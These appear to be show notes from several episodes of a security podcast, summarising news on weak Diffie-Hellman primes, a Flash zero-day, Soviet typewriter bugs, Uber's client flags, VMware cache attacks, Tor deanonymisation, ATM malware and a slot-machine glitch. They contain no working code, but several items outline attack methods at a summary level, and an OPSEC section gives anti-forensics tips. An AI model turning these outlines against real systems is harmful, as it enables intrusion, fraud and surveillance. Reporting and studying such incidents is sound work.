• “The key is, somewhat ironically, Diffie-Hellman key exchange, an algorithm that we and many others have advocated as a defense against mass surveillance. Diffie-Hellman is a cornerstone of modern cryptography used for VPNs, HTTPS websites, email, and many other protocols. Our paper shows that, through a confluence of number theory and bad implementation choices, many real-world users of Diffie-Hellman are likely vulnerable to state-level attackers.”
• “If a client and server are speaking Diffie-Hellman, they first need to agree on a large prime number with a particular form. There seemed to be no reason why everyone couldn’t just use the same prime, and, in fact, many applications tend to use standardized or hard-coded primes. But there was a very important detail that got lost in translation between the mathematicians and the practitioners: an adversary can perform a single enormous computation to “crack” a particular prime, then easily break any individual connection that uses that prime.”
• “For the most common strength of Diffie-Hellman (1024 bits), it would cost a few hundred million dollars to build a machine, based on special purpose hardware, that would be able to crack one Diffie-Hellman prime every year.”
• “Would this be worth it for an intelligence agency? Since a handful of primes are so widely reused, the payoff, in terms of connections they could decrypt, would be enormous. Breaking a single, common 1024-bit prime would allow NSA to passively decrypt connections to two-thirds of VPNs and a quarter of all SSH servers globally. Breaking a second 1024-bit prime would allow passive eavesdropping on connections to nearly 20% of the top million HTTPS websites. In other words, a one-time investment in massive computation would make it possible to eavesdrop on trillions of encrypted connections.”
• “Based on the evidence we have, we can’t prove for certain that NSA is doing this. However, our proposed Diffie-Hellman break fits the known technical details about their large-scale decryption capabilities better than any competing explanation. For instance, the Snowden documents show that NSA’s VPN decryption infrastructure involves intercepting encrypted connections and passing certain data to supercomputers, which return the key. The design of the system goes to great lengths to collect particular data that would be necessary for an attack on Diffie-Hellman but not for alternative explanations, like a break in AES or other symmetric crypto. While the documents make it clear that NSA uses other attack techniques, like software and hardware “implants,” to break crypto on specific targets, these don’t explain the ability to passively eavesdrop on VPN traffic at a large scale.”
• “8.4% of Alexa Top 1M HTTPS domains allow DHE_EXPORT, of which 92.3% use one of the two most popular primes”
• “After a week-long precomputation for each of the two top export-grade primes (see Table 1), we can quickly break any key exchange that uses them. Here we show times for computing 3,500 individual logs; the median is 70 seconds.”
• “Our calculations suggest that it is plausibly within NSA’s resources to have performed number field sieve precomputations for at least a small number of 1024-bit Diffie-Hellman groups. This would allow them to break any key exchanges made with those groups in close to real time. If true, this would answer one of the major cryptographic questions raised by the Edward Snowden leaks: How is NSA defeating the encryption for widely used VPN protocols?”
• If the NSA has precomputed just one DH 1024 group, they would be able to compromise 37% of the HTTPS traffic to the top 1 million sites using an active downgrade attack. If they have precomputed the ten most popular DH 1024 groups, that number increases to 56%
• When applied to VPNs, the single most popular DH 1024 group would comprise 66% of all traffic. For SSH, the number is 25%. For both VPN and SSH, the top 10 does not increase the likelihood of compromise, this suggests that outside of a specific very popular 1024 bit group, most other sites do not reuse the same group as others.
• “we performed a scan in which we mimicked the algorithms offered by OpenSSH 6.6.1p1, the latest version of OpenSSH. In this scan, 21.8% of servers preferred the 1024-bit Oakley Group 2, and 37.4% preferred a server-defined group. 10% of the server-defined groups were 1024-bit, but, of those, near all provided Oakley Group 2 rather than a custom group”
• Recommendations from the paper:
  • Transition to elliptic curves: Transitioning to elliptic curve Diffie-Hellman (ECDH) key exchange with appropriate parameters avoids all known feasible cryptanalytic attacks
  • Increase minimum key strengths: Server operators should disable DHE_EXPORT and configure DHE ciphersuites to use primes of 2048 bits or larger.
  • Avoid fixed-prime 1024-bit groups: For implementations that must continue to use or support 1024-bit groups for compatibility reasons, generating fresh groups may help mitigate some of the damage caused by NFS-style precomputation for very common fixed groups.
  • Don’t deliberately weaken crypto: Our downgrade attack on export-grade 512-bit Diffie-Hellman groups in TLS illustrates the fragility of cryptographic “front doors”. Although the key sizes originally used in DHE_EXPORT were intended to be tractable only to NSA, two decades of algorithmic and computational improvements have significantly lowered the bar to attacks on such key sizes.
• “Prior to our work, Internet Explorer, Chrome, Firefox, and Opera all accepted 512-bit primes, whereas Safari allowed groups as small as 16 bits. As a result of our disclosures, Internet Explorer, Firefox, and Chrome are transitioning the minimum size of the DHE groups they accept to 1024 bits, and OpenSSL and Safari are expected to follow suit.”
• Additional information from the researchers site WeakDH.org
• Sysadmin’s guide to securing your servers

• https://www.onlinemeetingnow.com/register/?id=pmsy0fu2ck&inf_contact_key=c3de960e4fc660a9c3744ecc74a608bdde91a80fc9d58288c71bfd6d9c0209ad

Fresh Zero Day exploit against fully patched Adobe Flash

• Just last week, we were commenting on how quiet things have been on the Adobe Flash front
• Sorry for jinxing it for everyone
• This zero day exploit even affects Flash version 19.0.0.207 which was released on Tuesday
• Adobe expects to release a patch that fixes the Zero day some time next week
• “Attackers are exploiting a previously unknown vulnerability in fully patched versions of Adobe’s Flash Player so they can surreptitiously install malware on end users’ computers”
• “So far, the attacks are known to target only government agencies as part of a long-running espionage campaign carried out by a group known as Pawn Storm, researchers from antivirus provider Trend Micro said in a blog post published Tuesday. It’s not unusual for such zero-day exploits to be more widely distributed once the initial element of surprise wanes. The critical security flaw is known to reside in Flash versions 19.0.0.185 and 19.0.0.207 and may also affect earlier versions. At this early stage, no other technical details are available”
• “In this most recent campaign of Pawn Storm, several Ministries of Foreign Affairs received spear phishing e-mails. These contain links to sites that supposedly contain information about current events, but in reality, these URLs hosted the exploit”
• In this wave of attacks, the emails were about the following topics:
  • “Suicide car bomb targets NATO troop convoy Kabul”
• “Syrian troops make gains as Putin defends air strikes”
• “Israel launches airstrikes on targets in Gaza”
• “Russia warns of response to reported US nuke buildup in Turkey, Europe”
• “US military reports 75 US-trained rebels return Syria”
• The most startling thing here is that you would not expect government employees to get such news via email, so they should know better than to fall for emails with these subjects or follow links with such headlines.
• “It’s worth noting that the URLs hosting the new Flash zero-day exploit are similar to the URLs seen in attacks that targeted North Atlantic Treaty Organization (NATO) members and the White House in April this year.”
• It will be interesting to see if any of the exploit kits manage to pick up this Zero-day before the patch is released
• This attack is currently focused on the government, and the attackers likely want to keep their zero-day to themselves
• Once a fix is released, I would expect the regular malware authors to reverse engineer the fix to find the exploit, and see this added to the regular exploit kits
• Additional Coverage: Krebs

Keylogging before computers: How Soviets used IBM Selectric keyloggers to spy on US diplomats

• “A National Security Agency memo that recently resurfaced a few years after it was first published contains a detailed analysis of what very possibly was the world’s first keylogger—a 1970s bug that Soviet spies implanted in US diplomats’ IBM Selectric typewriters to monitor classified letters and memos.”
• “The electromechanical implants were nothing short of an engineering marvel. The highly miniaturized series of circuits were stuffed into a metal bar that ran the length of the typewriter, making them invisible to the naked eye. The implant, which could only be seen using X-ray equipment, recorded the precise location of the little ball Selectric typewriters used to imprint a character on paper. With the exception of spaces, tabs, hyphens, and backspaces, the tiny devices had the ability to record every key press and transmit it back to Soviet spies in real time.”
• “The Soviet implants were discovered through the painstaking analysis of more than 10 tons’ worth of equipment seized from US embassies and consulates and shipped back to the US. The implants were ultimately found inside 16 typewriters used from 1976 to 1984 at the US embassy in Moscow and the US consulate in Leningrad. The bugs went undetected for the entire eight-year span and only came to light following a tip from a US ally whose own embassy was the target of a similar eavesdropping operation.”
• “”Despite the ambiguities in knowing what characters were typed, the typewriter attack against the US was a lucrative source of information for the Soviets,” an NSA document, which was declassified several years ago, concluded. “It was difficult to quantify the damage to the US from this exploitation because it went on for such a long time.” The NSA document was published here in 2012. Ars is reporting the document because it doesn’t appear to have been widely covered before and generated a lively conversation Monday on the blog of encryption and security expert Bruce Schneier.”
• “When the implant was first reported, one bugging expert cited in Discover magazine speculated that it worked by measuring minute differences in the time it took each character to be imprinted. That theory was based on the observation that the time the Selectric ball took to complete a rotation was different for each one. A low-tech listening device planted in the room would then transmit the sounds of a typing Selectric to a Soviet-operated computer that would reconstruct the series of key presses.”
• “In fact, the implant was far more advanced and worked by measuring the movements of the “bail,” which was the term analysts gave to the mechanical arms that controlled the pitch and rotation of the ball.”
• “In reality, the movement of the bails determined which character had been typed because each character had a unique binary movement corresponding to the bails. The magnetic energy picked up by the sensors in the bar was converted into a digital electrical signal. The signals were compressed into a four-bit frequency select word. The bug was able to store up to eight four-bit characters. When the buffer was full, a transmitter in the bar sent the information out to Soviet sensors.”
• “There was some ambiguity in determining which characters had been typed. NSA analysts using the laws of probability were able to figure out how the Soviets probably recovered text. Other factors which made it difficult to recover text included the following: The implant could not detect characters that were typed without the ball moving. If the typist pressed space, tab shift, or backspace, these characters were invisible to the implant. Since the ball did not move or tilt when the typist pressed hyphen because it was located at the ball’s home position, the bug could not read this character either.”
• “The implants were also remarkable for the number of upgrades they received. Far from being a static device that was built once and then left to do its job, the bugs were constantly refined.”
• “There were five varieties or generations of bugs. Three types of units operated using DC power and contained either eight, nine, or ten batteries. The other two types operated from AC power and had beacons to indicate whether the typewriter was turned on or off. Some of the units also had a modified on and off switch with a transformer, while others had a special coaxial screw with a spring and lug. The modified switch sent power to the implant. Since the battery-powered machines had their own internal source of power, the modified switch was not necessary. The special coaxial screw with a spring and lug connected the implant to the typewriter linkage, and this linkage was used as an antenna to transmit the information as it was being typed. Later battery-powered implants had a test point underneath an end screw. By removing the screw and inserting a probe, an individual could easily read battery voltage to see if the batteries were still active.”
• “The devices could be turned off to avoid detection when the Soviets knew inspection teams were in close proximity. Newer devices operated by the US may have had the ability to detect the implants, but even then an element of luck would have been required, since the infected typewriter would have to be turned on, the bug would have to be turned on, and the analyzer would have to be tuned to the right frequency. To lower this risk, Soviet spies deliberately designed the devices to use the same frequency band as local television stations.”
• I thought this was an interesting example of how espionage works and how hard it can be to detect

Feedback:

• 2gbps with direct connections?
  • ifconfig lagg0 create
  • ifconfig lagg0 laggproto roundrobin laggport igb0 laggport igb1
  • ifconfig lagg0 192.168.101.1/24

• VLAN Basics

• PHP-FPM Tweaking

• Remote PC power on
  • APC AP7900 is $600+, but can be cheap on ebay

Round Up:

• Security researcher claims $24k bounty from Microsoft for Hotmail hack
• Turning the FCC’s proposal around, a coalition of 260 security researchers want the FCC to REQUIRE that all router firmwares be open source
• University of Cambridge study finds 87% of Android devices are insecure
• Flaw in Kaspersky’s “Network Attack Blocker” could allow an adversary to trick your firewall into blocking traffic from any address, including Kaspersky and Windows update
• “USB Killer” flash drive can fry your computer’s innards in seconds
• OpenZFS adds new hashing algorithms: SHA512/256, Skein, and Edon-R … and RESUMABLE ZFS REPLICATION!!!!
• EMC agrees to buyout by Dell
• Web Authentication Arms Race — A tale of two security experts
• Windows 10 start menu to include ads for “suggest apps”
• Statically Linking a Windows Kernel Driver as an ELF — A FireEye challenge
• Kemoge: Another Mobile Malicious Adware Infecting Over 20 Countries
• Researcher sets up a DigitalOcean droplet with the shellshock vulnerability, and watches what happens
• Company offers up to $3 million for jailbreak of new “rootless” iOS9
• An XSS vector containing no letters

The post National Security Breaking Agency | TechSNAP 236 first appeared on Jupiter Broadcasting.

Using encryption is a good thing, but its just the start, we’ll explain. Plus how one developer totally owned the Uber app.

Then it’s a great batch of your questions & our answers!

Thanks to:

• Get Paid to Write for DigitalOcean

Direct Download:

HD Video | Mobile Video | MP3 Audio | OGG Audio | YouTube | HD Torrent | Mobile Torrent

RSS Feeds:

HD Video Feed | Mobile Video Feed | MP3 Audio Feed | Ogg Audio Feed | iTunes Feed | Torrent Feed

Become a supporter on Patreon:

— Show Notes: —

OPSEC (Operational Security) for Activists and Journalists

• Using encryption is a good thing, but if you need to hide from advanced adversaries, like foreign governments you are protecting against or reporting on, you need more than just encryption to make sure you don’t get “disappeared”
• The FBI has identified people even when they were using tor
• “The only protection against communication systems is to avoid their use.” —Cryptome [32], Communications Privacy Folly, June 13, 2012
• Anti-forensics [33] is all about reducing both the quantity and quality of information that adversaries acquire. In other words, if spies succeed in breaching your computer then give them as little useful information as possible. One way to achieve this is through compartmentalization, a technique honed to a fine edge by intelligence outfits like the KGB.
• Especially important secret government messages are still passed by courier, even the government doesn’t trust crypto 100%
• “Avoid patterns (geographic, chronological, etc.). Arbitrarily relocate to new spots during the course of a phone call. Stay in motion. Phone calls should be as short as possible so that the amount of data collected by surveillance equipment [44] during the call’s duration is minimized. This will make it more difficult for spies to make accurate predictions.”
• “Carrying additional mobile devices (e.g. surface tablet, second cell phone) creates the risk that the peripheral hardware may undermine anonymity through correlation. Finally, pay for items using cash when operational. Credit card transactions are like a big red flag”
• “If spies somehow captures a secure cell phone and are able to siphon data off of it, one potential countermeasure is to flood the device with false information. Skillful application of this technique can lead spies on a goose chase. When Edward Snowden was fleeing Hong Kong he intentionally bought a plane ticket to India with his own credit card in an effort to throw pursuers off his track.”
• “In summary, expect security tools to fail, compartmentalize to contain damage and apply the Grugq’s core tenets of anti-forensics. Don’t put blind faith in technology. Focus your resources on maintaining rigorous procedures. When things get dicey it’ll be your training and preparation that keep you secure.”

How I accessed employee settings on the Uber app

• While debugging an upcoming app, Nathan Mock an iOS Engineer, “accidentally” got a closer glimpse into Uber’s iOS app internals.
• Using Charles, a tool that allows you to monitor and analyze traffic between a client and the internet. You are able to self sign requests, effectively allowing you to view the requests in plain text. With the requests flowing in, he noticed a request made every 5 seconds.
• One particular request of interest is used by Uber to receive and communicate rider location, driver availability, application configurations settings and more to devices.
• Upon inspecting the response, he discovered the key isAdmin, which was set to false for his particular account. Charles allows you to define rewrite rules, so he rewrote the response changing, the value for isAdmin to true, curious to see the effects it would have on the app. He perused through the app with the new value applied… lo and behold, he stumbled upon the Employee Settings screen from the About screen
• Uber’s app is extremely dynamic. Their client’s architecture allows them to customize the app’s UI to certain geographical areas, riders, and even individual devices, allowing them to do things such as deliver kittens, deliver food, offer rides on helicopters, and of course, change prices…all without re-submitting the binary for approval to the app store. This is common practice for many client-server applications, a neat way to target certain features/functionality to a limited subset of users without the burden/time constraints of submitting an app for review.
• If a malicious developer wanted to get a forbidden feature or functionality past the review team, it is possible to hide the feature behind a “switch”, turning it off during the review process only to enable it after approved, all server side. If their purpose is to control the feature set of apps that get into the store, it can be bypassed through this type of client-server configuration architecture. Apple certainly has the power to take an app down once they make the discovery but before they make that discovery, it is out in the wild.
• As you can see, your traffic is not 100% safe and anyone can inspect your requests and responses (even with HTTPS), so it’s a good idea to always utilize defensive programming. A malicious third party could use this flaw to exploit the app in ways unforeseen. Even though Uber utilized HTTPS, there are still inherent flaws with the protocol that allows one to access certain screens meant for employees only.
• Uber recently suffered a data breach that leaked information about 50,000 drivers
• The breach apparently occurred on May 13 2014, was not discovered until September 17 2014, and was not announced until February 27 2015.
• “Uber says it will offer a free one-year membership of Experian’s ProtectMyID Alert”
• It turns out, Uber might have accidently stored sensitive database keys on a public github page, is sueing Github to get the IP address of those who accessed the information

Feedback:

• iSCSI Question

• What software is used for the video link on Techsnap (between Allan and Chris)

• Freebsd 10.1 on aging iMac G4

Round Up:

• Iran implicated in hack on US Casino
• How NGINX plans to support HTTP/2 and why it won’t be happening very soon
• This guys light bulb performed DDoS on his entire Smart House
• Intel announces new socketed i7 with Iris Pro graphics, and new i7 NUC
• MySQL 5.7 will include an HTTP server built in, to provide JSON API to access data
• Skylight – looking inside a new SMR (Shingled Magnetic Recording) drive while it is running
• The IT department is dead, Long live the IT department
• War Story: Building a ZFS Foot Cannon
• New Pharming attack targets home routers

The post An Uber Mess | TechSNAP 205 first appeared on Jupiter Broadcasting.

More and more data breaches are leading to blackmail but the stats don’t tell the whole story. We’ll explain.

Plus the latest in the Sony hack, and the wider reaction. Plus a great batch of emails & much, much more!

Thanks to:

• Get Paid to Write for DigitalOcean

Become a supporter on Patreon:

— Show Notes: —

Illinois Hospital being blackmailed with stolen Patient Data

• “An Illinois hospital says someone attempted to blackmail it to stop the release of data about some of its patients.”
• The hospital chain received an anonymous email asking for a substantial amount of money in order to prevent the release of patient data. A sample of the data was included in the email as proof
• “The hospital says it immediately notified law enforcement agencies.”
• “An investigation discovered the data relates to patients who visited Clay County Hospital clinics on or before February 2012. A hospital representative declined to disclose how many people are involved but said the data is limited to their names, addresses, Social Security numbers and dates of birth. No medical information was compromised in the breach”
• “The hospital believes the data has not been released so far. It didn’t disclose how the data was obtained but said an audit by an outside expert concluded the hospital hadn’t been hacked.”
• The age of the data suggests that the compromise may have involved backups and/or cold storage
• It is not clear of the Hospital stores the older data themselves, or if they rely on a 3rd party provider that may have been compromised
• “A recent report by the Identity Theft Report Center found that by early December there had been 304 breaches so far this year in the U.S. healthcare sector. That’s 42 percent of the 720 breaches reported across the country. But, in part because of the massive breaches at major retailers, the entire healthcare sector only accounted for 9.7 percent of all records compromised in reported breaches so far in 2014.”

Sony cancels the release of “The Interview” – plays the victim

• Sony has apparently cancelled the release of the film that is apparently the cause of the hack of their systems
• A number of cinemas had declined to screen the file after vague threats of physical violence were made
• “We are deeply saddened at this brazen effort to suppress the distribution of a movie, and in the process do damage to our company, our employees, and the American public,” Sony’s statement continues. “We stand by our filmmakers and their right to free expression and are extremely disappointed by this outcome.”
• If they stand for freedom of expression, they wouldn’t have cancelled the movie
• A number of people believe that the hackers may have found something especially damaging to Sony, and Sony is hoping to avoid the disclosure
• Bruce Schneier – “It’s really a phenomenally awesome hack—they completely owned this company,”
• “this is like Snowden, only with Sony.” He said that releases from the hack could go on for months.
• That seems to suggest that the hackers will soon leak something that will look very, very bad for the company, Schneier says.
• Earlier this week, Sony sent a letter to news outlets reporting on the leaks, saying that they could face prosecution for downloading stolen information. That letter, Schneier said, was a signal that the worst is still to come.
• Gawker posts a copy of the threatening letter
• “The fact that they sent that letter tells me there is stuff still to be found that Sony is terrified of. There’s some really bad stuff in there—stuff they did, stuff they said, stuff that’s illegal. Someone [from Sony] is going to jail for this.”
• Reaction to the Sony hack is beyond the realm of stupid – This is not terrorism
• Cisco analysis of Wiper malware used at Sony
• Newer version of Wiper malware signed with stolen Sony certificate
• ThreatPost Digital Undergound Podcast – Details of the Sony Breach
• The leak has also covered a number of different plans and plots by the MPAA
• Inclusing the MPAA’s post-SOPA plan to make ISP DNS Servers block sites

Feedback:

• FW Question

• IP management with 257 devices

• Isolating a server

• Certificate for web site
  • Mozilla TLS Server Side settings

• OpenYourMouth · GitHub

• Cipherli.st – Strong Ciphers for Apache, nginx and Lighttpd

Round Up:

• Viber calls out ESET for flagging them, ESET responds with a digital uppercut
• Yahoo releases new disclosure policy, all new bugs it finds will be disclosed within 90 days
• Report: Mysterious Russian Malware Is Infecting 100,000+ WordPress Sites
• Red October APT team is back, with the CloudAtlas APT attack
• Verizon’s new “end-to-end” encrypted calling app, includes “Government Access Option” – Cellcrypt’s vice president for North America, disputes the idea that building technology to allow wiretapping is a security risk. “It’s only creating a weakness for government agencies,” he says. “Just because a government access option exists, it doesn’t mean other companies can access it.”
• Leaked Government documents reveal Canadian Telco’s offering the Government “Surveillance Ready Networks”, to avoid legislation, and to force small operators out of the market
• Ars was briefly hacked yesterday; here’s what we know (Ars uses PHPass to hash passwords, that is 2048 rounds of MD5. Not as bad as it sounds: If you want to put this into “OL Hashcat” terms, a single R9 290X (video card) can pull ~ 12.2 GH/s on raw MD5, but only 3 MH/s against PHPass. Divide that by 1,071,734 unique salts, and that means our effective speed is only 2.86 H/s. That’s beyond properly slow.)
• A small bank in Kansas may be the future of banking, replacing ‘batched processed’ ACH transfers with instant transfers backed by the existing ATM processing network
• phpBB Status Update
• Study by Dell SecureWorks researchers finds that prices on the Internet Underground are rising

The post Don’t Fire IT | TechSNAP 193 first appeared on Jupiter Broadcasting.

We’ll tell you about the VMware flaw so bad, the solution is to just turn the service off & we now have more details on a major Windows flaw.

Plus new research discovers that up to 81% of Tor users could be de-anonymized, a great batch of your networking questions & much, much more!

Thanks to:

• Get Paid to Write for DigitalOcean

Become a supporter on Patreon:

— Show Notes: —

Why the VMWare TPS flaw is a big deal

• VMWare recently disclosed a vulnerability in its line of virtualization products (vSphere, ESXi, etc)
• VMWare has a feature called TPS (“Transparent Page Sharing”), which basically provides deduplication of memory between virtual machines
• When two or more virtual machines have an identical 4k block of memory, only 1 block of physical memory on the host is actually used
• VMs may have many common blocks if they are running the same OS and Applications, especially if the VMs are clones of each other
• “Experimental implementations show that using this method, it is possible to run over 50 Windows XP VMs with 1GB of RAM each on a physical machine with just 16GB of RAM”
• VMWare Whitepapers of TPS for ESXi 3 and vSphere 5
• The TPS feature is not new, it has shipped in VMWare since 2006, and is on by default
• “Why is this a big deal? Because a virtualized architecture demands VM isolation, this is the most important security requirement for virtualization. Each VM guest running on a host must not be allowed in any way to access another VM guest. They must be kept in separate locked rooms with only the hypervisor possessing the keys to access all of them”
• “VMware appears to be down-playing it as it obviously exposes a chink in their virtual armor, they have issued a KB article describing the vulnerability and giving guidance on how customers can disable TPS on their hosts. VMware doesn’t name the specific source that found the vulnerability in the KB article, they simply refer to it as “an academic paper””
• THE “Academic Paper” — Wait a minute! A fast, Cross-VM attack on AES
• “This work exploits resource sharing in virtualization software to build a powerful cache-based attack on AES. We demonstrate the vulnerability by mounting Cross-VM Flush+Reload cache attacks in VMware VMs to recover the AES keys of OpenSSL 1.0.1 running inside the victim VM. Furthermore, the attack works in a realistic setting where different VMs are located on separate cores. The modified flush+reload attack we present, takes only in the order of seconds to minutes to succeed in a cross-VM setting. Therefore long term co-location, as required by other fine grain attacks in the literature, are not needed. The results of this study show that there is a great security risk to OpenSSL AES implementation running on VMware cloud services when the deduplication is not disabled.”
• The paper describes a technique in which an attacker with access to a VM on the same physical machine, even if it is not on the same CPU Core, could recover the SSL/TLS private key from a web server running Apache+OpenSSL in a victim VM
• This would then allow the attacker to impersonate that site, possibly allowing them to successfully phish or otherwise gain sensitive information from end users
• “All versions of vSphere back to VI3 are vulnerable to the exploit but VMware is only patching the 5.x versions of vSphere as the 4.x versions are no longer officially supported as of May 2014”. “Note these patches only disable TPS which is currently enable by default, they do nothing to fix the vulnerability, it will most likely take VMware some time to figure out how to make TPS work in a way that cannot be exploited”

WinShock – What that Microsoft SChannel vulnerability was

• SChannel is Microsofts tool similar to OpenSSL. “SChannel is used by anything leveraging built-in SSL and TLS this includes IIS, Active Directory, OWA, Exchange, Internet Explorer, and Windows Update.”
• The vulnerability allows remote code execution, so it especially severe, and users should patch immediately if they have not already done so
• An attacker can send specially crafted malicious packets, which are not properly checked for validity, and the victim machine may execute commands included in that message, allowing the attacker to take full control of the machine
• Rapid7 Blog: Is MS14-066 another Red alert?
• Rapid7 takes pains to clarify that this is not on the same level as Heartbleed, Shellshock, Poodle, or other recent vulnerabilities of that scale, mostly because this was privately disclosed to Microsoft, and is not being actively exploited in the wild
• No one knows the details of the problem yet, and there are no proof-of-concept exploits
• “Details surrounding the vulnerability are vague, but Microsoft has indicated that there are no known exploits in the wild and the development of exploit code will be challenging. This vulnerability is reported to affect all Windows servers and clients, and while it’s unlikely to be exploited today, it should be patched as soon as possible given the possibility of remote code execution.”

New research discovers that up to 81% of tor users could be de-anonymized by new traffic analysis techniques

• “Research undertaken between 2008 and 2014 suggests that more than 81% of Tor clients can be ‘de-anonymised’ – their originating IP addresses revealed – by exploiting the ‘Netflow’ technology that Cisco has built into its router protocols, and similar traffic analysis software running by default in the hardware of other manufacturers.”
• “The technique depends on injecting a repeating traffic pattern – such as HTML files, the same kind of traffic of which most Tor browsing consists – into the TCP connection that it sees originating in the target exit node, and then comparing the server’s exit traffic for the Tor clients, as derived from the router’s flow records, to facilitate client identification.”
• “To achieve acceptable quality of service, [Tor attempts] to preserve packet interarrival characteristics, such as inter-packet delay. Consequently, a powerful adversary can mount traffic analysis attacks by observing similar traffic patterns at various point
• “Traffic analysis of this kind does not involve the enormous expense and infrastructural effort that the NSA put into their FoxAcid Tor redirects, but it benefits from running one or more high-bandwidth, high-performance, high-uptime Tor relays”
• The technical involves getting the user to download a file, large enough that it takes a few minutes over which the flow of data can be manipulated and observed (this could be as easy as injecting an oversized images into a website, where the user does not see it)
• By having the server that is sending the image modulate the bandwidth of the TCP connection in question, shifting every 20 seconds between 1 mbit (about the max you would expect to be able to get over tor), 50 kbit, 300 kbit, and then 100 kbit, it created a unique enough pattern of traffic, that tor preserved, that the same pattern could be observed on the entry node that the tor user was connected to
• By collecting Netflow type data (start and end time, source and destination ip, number of packets, number of bytes), from the source (or exit node) and the entry node (or a router in front of the entry node or the end user), and correlated the data, researchers were able to identify the real ip address of the tor user that connected to their server

Feedback:

• How to prevent a “man-in-the-browser attack” to my lastpass account ?

• pfSense and vlans

• Masque attack

• Looking for some DDOS protection tool, what do you use, how did you configured it?

Round Up:

• Let’s Encrypt
• WhatsApp adds end-to-end encryption using TextSecure
• Apple Disables Trim Support On 3rd Party SSDs In OS X
• The upside of accidently hiring a hacker
• SUSE Linux Enterprise Live Patching Now Available
• Government Employees and Contractors responsible for most government data breaches
• FTC shuts down massive “PC cleaner” scam
• The problem with Android on big tablets
• Amnesty, EFF, Privacy International Put Out Free Anti-Surveillance Tool
• New York to roll out gigabit wifi and touch screen ‘information stations’ in place of old pay phones

The post Tor Vibrations | TechSNAP 190 first appeared on Jupiter Broadcasting.

The Belkin router apocalypse takes users offline all over the world, Infected ATMs spit out money on cue, plus isolating your network, a great batch of your questions & much, much more!

Thanks to:

• Get Paid to Write for DigitalOcean

Become a supporter on Patreon:

— Show Notes: —

Belkin router apocolypse, world wide outage of almost all Belkin routers

• “Starting approximately midnight on October 7, Belkin began experiencing an issue with a service configured in certain Belkin router models that causes a failure when it checks for general network connectivity by pinging a site hosted by Belkin.”
• It seems Belkin routers check to see if “the internet is up” by pinging or connecting to heartbeat.belkin.com. When this service went down, all of those routers decided the internet was ‘down’, and stopped letting customers use the Internet, despite the fact that the rest of the Internet was fine
• “One of our cloud services associated with maintaining router operations was negatively impacted by a change made in our data center that caused a false denial of service. Normal operations were restored by 3PM PST, but some users might still need to reset their router and/or cable modem to regain connectivity. Moving forward, we will continue to monitor, improve and validate the system to ensure our routers continue to work properly in the event connectivity to our cloud environment is not available. “
• The fact that the routers rely on only a single signal, a response from heartbeat.belkin.com, to determine if the internet is working, seems wrong.
• Even so, it doesn’t explain why the routers ‘give up’ and stops users accessing the Internet
• It appears this has to do with the DNS Resolver in the Router, which stops attempting to resolve addresses when it cannot reach the Belkin site. Users to manually change their DNS servers to Google Public DNS or OpenDNS had their service restored
• What if the Belkin site goes down? (Like it did). What if there is a routing or transit issue? What if access to the Belkin site is blocked in your country?
• “If your service has not yet been restored, please unplug your router and plug it back in after waiting 1 minute. Wait 5 more minutes and the router should reconnect.”
• There were rumours that this issue was caused by a firmware update. Belkin denies this, although it is not clear if they had pushed a firmware update around the same time or not
• Interesting: Apparently Belkin’s call center got a high volume of calls. How many users call their Router manufacturer when they have an issue, rather than their ISP? My Cisco router/modem only had my ISPs phone number on it.
• Belkin Status Page
• Belkin Community Forums
• Additional Coverage: Internet Storm Center

Infected ATMs spit out money on queue, without debiting anyones bank account

• “What do you need in order to withdraw cash from an ATM?”
• First, you need to have a debit or credit card, which acts as a key to your bank account
• Second, you must know the PIN code associated with the card; otherwise, the bank wouldn’t approve the transaction.
• Finally, you need to have some money in your account that you can withdraw.
• Or, you just need a bootable CD
• “However, hackers do things differently: they don’t need cards, PIN codes or bank accounts to get money. In reality, all they need is an ATM with some cash in it and a special piece of software.”
• “criminals were somehow able to physically access the ATMs so that they could install the malware via a bootable CD on an embedded Windows machine”
• “The trojan that was used had complex abilities. First, when activated inside of the ATM, it had the ability to turn off the McAfee Solidcare AV software so that it could do its job with ease”
• “Second, to avoid accidental detection, Tyupkin trojan had the ability to stay in a standby mode for an entire week and activate only Sunday and Monday nights.”
• “Third, it had the ability to disable the local network in the case of an emergency, so that the bank could not remotely connect to the ATM to check on what was happening with it.”
• “All an attacker has to do is merely approach an infected ATM and enter a special PIN code in order to access the secret menu that will allow him to make cash withdrawals or control the trojan (for example, to delete it).”
• “To make a withdrawal the person has to know the appropriate commands, as well as a special formula that will calculate a session key — some kind of a two-factor authentication. If both codes are correct, then a second menu will appear that allows the criminal to choose the cassette number and make a withdrawal.”
• “Although one can only dispense 40 banknotes per transaction, it’s possible to dispense any amount of money by simply performing the actions several times over.”

Pair arrested for exploiting flaw in Casino slot machines

• John Kane, a gambling addict, and an accomplice, Andre Nestor, exploited a bug in Game King video poker slot machines
• “It turned out the Game King’s endless versatility was also its fatal flaw. In addition to different game variants, the machine lets you choose the base level of your wagers: At the low-limit Fremont machines, you could select six different denomination levels, from 1 cent to 50 cents a credit”
• “The key to the glitch was that under just the right circumstances, you could switch denomination levels retroactively. That meant you could play at 1 cent per credit for hours, losing pocket change, until you finally got a good hand—like four aces or a royal flush. Then you could change to 50 cents a credit and fool the machine into re-awarding your payout at the new, higher denomination. “
• “Performing that trick consistently wasn’t easy—it involved a complicated misdirection that left the Game King’s internal variables in a state of confusion. But after seven hours rooted to their seats, Kane and Nestor boiled it down to a step-by-step recipe that would work every time. “
• It turns out John Kane was very familiar with the slot machine in question:
• “he blew half a million dollars in 2006 alone—a pace that earned him enough Player’s Club points to pay for his own Game King to play at his home on the outskirts of Vegas, along with technicians to service it. (The machine was just for fun—it didn’t pay jackpots.)“ He’s played more than anyone else in the United States, says his lawyer, Andrew Leavitt. I’m not exaggerating or embellishing. It’s an addiction.”
• Game King 5.0 was released in 2002, however it contained a series of subtle errors in program number G0001640 that evaded laboratory testing and source code review.
• “The bug survived like a cockroach for the next seven years. It passed into new revisions, one after another, ultimately infecting 99 different programs installed in thousands of IGT machines around the world. As far as anyone knows, it went completely undetected until late April 2009, when John Kane was playing at a row of four low-limit Game Kings outside the entrance to a Chinese fast food joint”
• “Kane had some idea of how the glitch operated but hadn’t been able to reliably reproduce it. Working together, the two men began trying different combinations of play, game types, and bet levels, sounding out the bug like bats in the dark.”
• The pair eventually sorted out the details, and managed to get more than $750,000 out of various slot machines before being arrested

Feedback:

• Building a FreeBSD storage backend for my cloud
  • High Availably Storage Technology
  • FreeBSD Wiki about GlusterFS

• Home hybrid router replacement

• Server Isolation

• What to do when cafes have terrible network the security

Round up:

• Adobe is Spying on Users, Collecting Data on Their eBook Libraries
• Shell Shock proof-of-concepts against various applications, also includes one-liners to test your bash against each different vulnerability
